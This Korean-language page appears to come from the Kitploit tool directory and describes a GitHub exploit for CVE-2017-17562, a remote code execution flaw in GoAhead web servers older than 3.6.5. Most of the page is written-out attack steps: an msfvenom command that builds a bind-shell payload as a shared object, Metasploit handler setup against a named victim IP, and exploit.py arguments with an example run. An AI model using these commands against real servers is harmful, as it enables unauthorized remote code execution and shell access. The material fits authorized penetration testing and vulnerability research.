Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
goahead-rce-exploit — CVE-2017-17562 취약점을 위한 익스플로잇으로, CGI가 활성화되고 CGI 프로그램이 동적으로 링크된 경우 GoAhead (< v3.6.5)에서 RCE를 허용합니다. | Kitploit
도구/GitHubGitHub/nu11pointer/goahead-rce-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnu11pointer/goahead-rce-exploit

goahead-rce-exploit

CVE-2017-17562 취약점을 위한 익스플로잇으로, CGI가 활성화되고 CGI 프로그램이 동적으로 링크된 경우 GoAhead (< v3.6.5)에서 RCE를 허용합니다.

저장소 보기
812년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

GoAhead 웹 서버 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' 원격 코드 실행

CVE-2017-17562 취약점에 대한 익스플로잇으로, CGI가 활성화되고 CGI 프로그램이 동적으로 링크된 경우 GoAhead(< v3.6.5)에서 RCE를 가능하게 합니다.

Usage

root@kitploit:~
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

Requirements

root@kitploit:~
$ python3 -m pip install -r requirements.txt

주의!

먼저 페이로드를 생성하고 리스닝 연결을 설정해야 합니다.
예시:
(공격자: 192.168.1.100 - 피해자: 192.168.1.200)

root@kitploit:~
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

그런 다음 다른 셸에서 이 익스플로잇을 실행하여 리스너로의 역방향 연결을 시작할 페이로드를 전송해야 합니다!

Arguments

root@kitploit:~
Required arguments:
  --host HOST        Host running the GoAhead webserver.
  --port PORT        Port running the GoAhead webserver. Default: 80
  --payload PAYLOAD  Path to the payload.

Optional arguments:
  --ssl              Host is using SSL.
  --cgi LIST         Paths list to discover the CGI script on the GoAhead server. Default: paths.lst

Example

root@kitploit:~
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
도구 다운로드